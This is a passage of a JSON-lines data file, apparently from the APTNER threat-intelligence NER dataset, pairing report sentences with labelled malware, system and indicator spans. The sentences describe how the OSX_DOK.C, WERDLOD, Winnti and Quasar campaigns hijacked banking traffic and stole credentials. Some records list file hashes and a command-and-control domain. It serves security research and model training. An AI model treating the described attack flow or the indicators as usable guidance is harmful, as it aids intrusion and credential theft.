"aptner_train_006526", "source": "aptner_train"}} {"text": "The sample we analyzed was a purported message from a police inspector in Zurich allegedly claiming to unsuccessfully contact the recipient .", "spans": {}, "info": {"id": "aptner_train_006527", "source": "aptner_train"}} 
{"text": "The email also comes with two files attached claiming to contain questions for the user : one is a .zip file , which is a fake OS X app , while the other is a .docx file used to target Windows operating systems using WERDLOD .", "spans": {"System: email": [[4, 9]], "System: OS X app": [[127, 135]], "System: Windows": [[185, 192]], "Malware: WERDLOD": [[217, 224]]}, "info": {"id": "aptner_train_006528", "source": "aptner_train"}} {"text": "Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": {"Malware: Banking Trojans": [[30, 45]]}, "info": {"id": "aptner_train_006529", "source": "aptner_train"}} {"text": "Some examples of the files used in the email attachment include the following :", "spans": {"System: email": [[39, 44]]}, "info": {"id": "aptner_train_006530", "source": "aptner_train"}} {"text": "Zahlungsinformationen 01.06.2017.zip .", "spans": {"Indicator: Zahlungsinformationen 01.06.2017.zip": [[0, 36]]}, "info": {"id": "aptner_train_006531", "source": "aptner_train"}} {"text": "Zahlungsinformationen digitec.zip .", "spans": {"Indicator: Zahlungsinformationen digitec.zip": [[0, 33]]}, "info": {"id": "aptner_train_006532", "source": "aptner_train"}} {"text": "Dokument 09.06.2017.zip .", "spans": {"Indicator: Dokument 09.06.2017.zip": [[0, 23]]}, "info": {"id": "aptner_train_006533", "source": "aptner_train"}} {"text": "Dokument 09.06.2017.docx .", "spans": {"Indicator: Dokument 09.06.2017.docx": [[0, 24]]}, "info": {"id": "aptner_train_006534", "source": "aptner_train"}} {"text": "06.2017.docx .", "spans": {"Indicator: 06.2017.docx": [[0, 12]]}, "info": {"id": "aptner_train_006535", "source": "aptner_train"}} {"text": "Once the docx file included in the phishing email is clicked , a warning window will pop up .", "spans": {}, "info": {"id": "aptner_train_006536", "source": "aptner_train"}} {"text": "After this , the App Store on the system will be removed , followed by a full screen fake OS X update screen .", 
"spans": {"System: App Store": [[17, 26]], "System: OS X": [[90, 94]]}, "info": {"id": "aptner_train_006537", "source": "aptner_train"}} {"text": "It will ask for a password to run command as root .", "spans": {}, "info": {"id": "aptner_train_006538", "source": "aptner_train"}} {"text": "The malware will begin to download other utilities .", "spans": {"System: utilities": [[41, 50]]}, "info": {"id": "aptner_train_006539", "source": "aptner_train"}} {"text": "It relies on Homebrew , an open source software package manager to install Golang and Tor .", "spans": {"System: Homebrew": [[13, 21]], "System: software": [[39, 47]], "System: Golang": [[75, 81]], "System: Tor": [[86, 89]]}, "info": {"id": "aptner_train_006540", "source": "aptner_train"}} {"text": "The malware will then install fake certificates in the system to perform a MitM attack without notifying the user .", "spans": {}, "info": {"id": "aptner_train_006541", "source": "aptner_train"}} {"text": "The structure of the fake App Store matches the application bundle structure and provides both English and German interfaces .", "spans": {"System: App Store": [[26, 35]]}, "info": {"id": "aptner_train_006542", "source": "aptner_train"}} {"text": "The archive in Mac OS X looks like this :", "spans": {"System: Mac OS X": [[15, 23]]}, "info": {"id": "aptner_train_006543", "source": "aptner_train"}} {"text": "Mac OS X will run the application if it passes certificates .", "spans": {"System: Mac OS X": [[0, 8]]}, "info": {"id": "aptner_train_006544", "source": "aptner_train"}} {"text": "In this case , the malware is signed off by a “ developer ” , which may actually be a dummy account or that of a compromised user .", "spans": {}, "info": {"id": "aptner_train_006545", "source": "aptner_train"}} {"text": "In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": {"Organization: CA": [[36, 38]]}, "info": {"id": "aptner_train_006546", "source": 
"aptner_train"}} {"text": "The fake certificate imitates the COMODO root certificate .", "spans": {"Organization: COMODO": [[34, 40]]}, "info": {"id": "aptner_train_006547", "source": "aptner_train"}} {"text": "Take note that the fake certificate does not contain a COMODO Certificate Authority seal that certifies its validity , as seen in the comparison below :", "spans": {"Organization: COMODO Certificate Authority": [[55, 83]]}, "info": {"id": "aptner_train_006548", "source": "aptner_train"}} {"text": "We noticed that this malware will not work for Mozilla Firefox or Google Chrome since these two browsers have their own root certificates .", "spans": {"System: Mozilla Firefox": [[47, 62]], "System: Google Chrome": [[66, 79]], "System: browsers": [[96, 104]]}, "info": {"id": "aptner_train_006549", "source": "aptner_train"}} {"text": "Of all the major browsers , only Safari uses the system ’s certificates .", "spans": {"System: browsers": [[17, 25]], "System: Safari": [[33, 39]]}, "info": {"id": "aptner_train_006550", "source": "aptner_train"}} {"text": "We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": {"System: Windows": [[40, 47]], "System: Mac OS X": [[52, 60]]}, "info": {"id": "aptner_train_006551", "source": "aptner_train"}} {"text": "There is a file shortcut embedded in the malicious .docx file—one that will download an executable file from Dropbox that executes once clicked by the user .", "spans": {"Indicator: .docx": [[51, 56]], "System: Dropbox": [[109, 116]]}, "info": {"id": "aptner_train_006552", "source": "aptner_train"}} {"text": "The functionalities are similar to the malicious app provided , which includes installing tor and proxy .", "spans": {"Malware: malicious app": [[39, 52]], "System: tor": [[90, 93]], "System: proxy": [[98, 103]]}, "info": {"id": "aptner_train_006553", "source": "aptner_train"}} {"text": "We have already notified Dropbox about the use of its service for this 
malware .", "spans": {"System: Dropbox": [[25, 32]]}, "info": {"id": "aptner_train_006554", "source": "aptner_train"}} {"text": "Dropbox has already taken down the links .", "spans": {"System: Dropbox": [[0, 7]]}, "info": {"id": "aptner_train_006555", "source": "aptner_train"}} {"text": "The malware will install two proxies running on local host port 5555 and 5588 .", "spans": {"System: proxies": [[29, 36]]}, "info": {"id": "aptner_train_006556", "source": "aptner_train"}} {"text": "All of the traffic will be hijacked into the first proxy ( port 5555 ) with the victim ’s external IP address as parameter .", "spans": {}, "info": {"id": "aptner_train_006557", "source": "aptner_train"}} {"text": "The first ( port 5555 ) proxy first finds the IP parameter .", "spans": {}, "info": {"id": "aptner_train_006558", "source": "aptner_train"}} {"text": "If it is not in Switzerland , the traffic will proceed as normal .", "spans": {}, "info": {"id": "aptner_train_006559", "source": "aptner_train"}} {"text": "If it detects an IP located in Switzerland , the malware will run an obfuscated JavaScript code and find its visiting domain .", "spans": {"Indicator: IP": [[17, 19]], "Malware: malware will": [[49, 61]]}, "info": {"id": "aptner_train_006560", "source": "aptner_train"}} {"text": "If the domain is in the target , the malware will perform a MitM attack and redirect the traffic to the second proxy ( port 5588 ) , which routes the traffic to the Tor network .", "spans": {}, "info": {"id": "aptner_train_006561", "source": "aptner_train"}} {"text": "The purpose of these steps is to target users in Switzerland and hijack their traffic After deobfuscating the malware , we found the target domains :", "spans": {}, "info": {"id": "aptner_train_006562", "source": "aptner_train"}} {"text": "The target domain ’s visitors will be redirected into an e-banking login page that looks and acts normally , but is located on dark web sites .", "spans": {}, "info": {"id": "aptner_train_006563", 
"source": "aptner_train"}} {"text": "However , once the victim enters an account and password .", "spans": {}, "info": {"id": "aptner_train_006564", "source": "aptner_train"}} {"text": "A window will pop out .", "spans": {}, "info": {"id": "aptner_train_006565", "source": "aptner_train"}} {"text": "The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": {}, "info": {"id": "aptner_train_006566", "source": "aptner_train"}} {"text": "We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": {}, "info": {"id": "aptner_train_006567", "source": "aptner_train"}} {"text": "Once the user enters an account and password , it will initiate POST using AJAX .", "spans": {}, "info": {"id": "aptner_train_006568", "source": "aptner_train"}} {"text": "The POST message is sent to the same site as the fake login page—which an attacker can control inside the Tor network .", "spans": {}, "info": {"id": "aptner_train_006569", "source": "aptner_train"}} {"text": "We decoded the data section and found not only the account and password , but that it also fingerprinted the user ’s browser and system information .", "spans": {}, "info": {"id": "aptner_train_006570", "source": "aptner_train"}} {"text": "While Operation Emmental was able to bypass two-way authentication by tricking its victims into installing a fake app , we have not observed OSX_DOK.C doing this .", "spans": {"System: fake app": [[109, 117]], "Malware: OSX_DOK.C": [[141, 150]]}, "info": {"id": "aptner_train_006571", "source": "aptner_train"}} {"text": "However , since they can inject code into the webpage , it means they have the ability to do this as well .", "spans": {}, "info": {"id": "aptner_train_006572", "source": "aptner_train"}} {"text": "We performed static analysis on the sample and found it packed by Ultimate Packer for Executables ( UPX ) , an open source executable packer that can often be abused by malware 
.", "spans": {"System: Ultimate Packer": [[66, 81]], "System: Executables": [[86, 97]], "Malware: malware": [[169, 176]]}, "info": {"id": "aptner_train_006573", "source": "aptner_train"}} {"text": "We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": {"System: UPX unpacker": [[68, 80]]}, "info": {"id": "aptner_train_006574", "source": "aptner_train"}} {"text": "The malware is not obfuscated so we easily found interesting strings here .", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "aptner_train_006575", "source": "aptner_train"}} {"text": "We can see that the malware relies on bash shell for most of its setup .", "spans": {"Malware: malware": [[20, 27]]}, "info": {"id": "aptner_train_006576", "source": "aptner_train"}} {"text": "We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": {}, "info": {"id": "aptner_train_006577", "source": "aptner_train"}} {"text": "The UPX gave a warning message about memory buffer overflow .", "spans": {"System: UPX": [[4, 7]]}, "info": {"id": "aptner_train_006578", "source": "aptner_train"}} {"text": "The malware author seemingly made unpacking the malware more difficult to slow down or even evade the antivirus engine ’s scanning process .", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "aptner_train_006579", "source": "aptner_train"}} {"text": "The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": {"System: UPX": [[84, 87]]}, "info": {"id": "aptner_train_006580", "source": "aptner_train"}} {"text": "We have reported the issues to the UPX team , and they have already fixed it .", "spans": {"System: UPX": [[35, 38]]}, "info": {"id": "aptner_train_006581", "source": "aptner_train"}} {"text": "While OSX_DOK.C is designed for MAC OS X , which is a Unix-like system , WERDLOD is designed for Windows .", "spans": {"Malware: OSX_DOK.C": [[6, 15]], "System: MAC": [[32, 
35]], "Malware: WERDLOD": [[73, 80]], "System: Windows": [[97, 104]]}, "info": {"id": "aptner_train_006586", "source": "aptner_train"}} {"text": "Both malware share the same proxy settings and script :", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006592", "source": "aptner_train"}} {"text": "In particular , WERDLOD uses scripts running on http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip} as proxy :", "spans": {"Malware: WERDLOD": [[16, 23]], "Indicator: http://127.0.0.1:5555/#{random_string}.js?ip=#{my_ip}": [[48, 101]]}, "info": {"id": "aptner_train_006594", "source": "aptner_train"}} {"text": "Both malware have similar targets .", "spans": {"Malware: malware": [[5, 12]]}, "info": {"id": "aptner_train_006596", "source": "aptner_train"}} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006608", "source": "aptner_train"}} {"text": "We then discuss how centralized response options , provided as enhancements to Windows Defender ATP with the Windows 10 Creators Update , can be used to quickly stop threats , including stopping command and control ( C&C ) communication and preventing existing implants from installing additional components or from moving laterally to other computers on the network .", "spans": {"System: centralized response options": [[20, 48]], "System: Windows Defender ATP": [[79, 99]], "System: the Windows 10 Creators Update": [[105, 135]]}, "info": {"id": "aptner_train_006615", "source": "aptner_train"}} {"text": "Initial intrusion stages feature the Win32/Barlaiy implant—notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C .", "spans": {"Malware: Win32/Barlaiy": [[37, 50]], "System: social network profiles": [[82, 105]], "System: collaborative document editing sites": [[108, 144]], "System: blogs": [[151, 156]]}, "info": {"id": 
"aptner_train_006622", "source": "aptner_train"}} {"text": "The majority of victims recorded to date have been in electronic gaming , multimedia , and Internet content industries , although occasional intrusions against technology companies have occurred .", "spans": {"Organization: technology companies": [[160, 180]]}, "info": {"id": "aptner_train_006624", "source": "aptner_train"}} {"text": "In contrast , LEAD has established a far greater reputation for industrial espionage .", "spans": {"Organization: LEAD": [[14, 18]]}, "info": {"id": "aptner_train_006625", "source": "aptner_train"}} {"text": "Backdoor command and control .", "spans": {}, "info": {"id": "aptner_train_006653", "source": "aptner_train"}} {"text": "Credential theft .", "spans": {}, "info": {"id": "aptner_train_006654", "source": "aptner_train"}} {"text": "Winnti is no exception , and so , during Winnti ’s installation process , Windows Defender ATP is able to raise behavioral alerts .", "spans": {"Organization: Winnti": [[0, 6], [41, 47]], "System: Windows Defender ATP": [[74, 94]]}, "info": {"id": "aptner_train_006658", "source": "aptner_train"}} {"text": "Meanwhile , connectivity to the Windows Defender ATP service is maintained .", "spans": {"System: Windows": [[32, 39]]}, "info": {"id": "aptner_train_006669", "source": "aptner_train"}} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006677", "source": "aptner_train"}} {"text": "Detecting threat actors in recent German industrial attacks with Windows Defender ATP .", "spans": {"System: Windows Defender ATP": [[65, 85]]}, "info": {"id": "aptner_train_006678", "source": "aptner_train"}} {"text": "The initial infection vector in this attack is not clear , but it results in installing the “ Downeks ” downloader , which in turn infects the victim computer with the “ Quasar ” RAT .", "spans": {"Malware: Downeks": 
[[94, 101]], "Malware: Quasar": [[170, 176]], "System: RAT": [[179, 182]]}, "info": {"id": "aptner_train_006684", "source": "aptner_train"}} {"text": "We observed these Quasar samples :", "spans": {"Malware: Quasar": [[18, 24]]}, "info": {"id": "aptner_train_006690", "source": "aptner_train"}} {"text": "f-secure.exe : 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f connects to hnoor.newphoneapp.com .", "spans": {"Indicator: f-secure.exe": [[0, 12]], "Indicator: 99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f": [[15, 79]], "Indicator: hnoor.newphoneapp.com": [[92, 113]]}, "info": {"id": "aptner_train_006691", "source": "aptner_train"}} {"text": "HD_Audio.exe : 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 crashes upon execution . sim.exe 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 connects to hnoor.newphoneapp.com .", "spans": {"Indicator: HD_Audio.exe": [[0, 12]], "Indicator: 86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806": [[15, 79]], "Indicator: sim.exe": [[105, 112]], "Indicator: 723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42": [[113, 177]], "Indicator: hnoor.newphoneapp.com": [[190, 211]]}, "info": {"id": "aptner_train_006693", "source": "aptner_train"}} {"text": "We analyzed a Quasar sample we found that was communicating with an active C2 server at the time of analysis :", "spans": {"Malware: Quasar": [[14, 20]], "System: C2": [[75, 77]]}, "info": {"id": "aptner_train_006717", "source": "aptner_train"}} {"text": "We discovered that the sample was obfuscated using .NET reactor .", "spans": {"Indicator: the sample": [[19, 29]], "System: obfuscated": [[34, 44]], "System: .NET reactor": [[51, 63]]}, "info": {"id": "aptner_train_006730", "source": "aptner_train"}} {"text": "The configuration of Quasar is stored in the Settings object , which is encrypted with a password which is itself stored unencrypted .", "spans": {"Malware: Quasar": [[21, 27]]}, 
"info": {"id": "aptner_train_006735", "source": "aptner_train"}} {"text": "Modifications :", "spans": {}, "info": {"id": "aptner_train_006736", "source": "aptner_train"}} {"text": "Modifications :", "spans": {}, "info": {"id": "aptner_train_006743", "source": "aptner_train"}} {"text": "Uses SHA256 instead of MD5 to create the key .", "spans": {}, "info": {"id": "aptner_train_006744", "source": "aptner_train"}}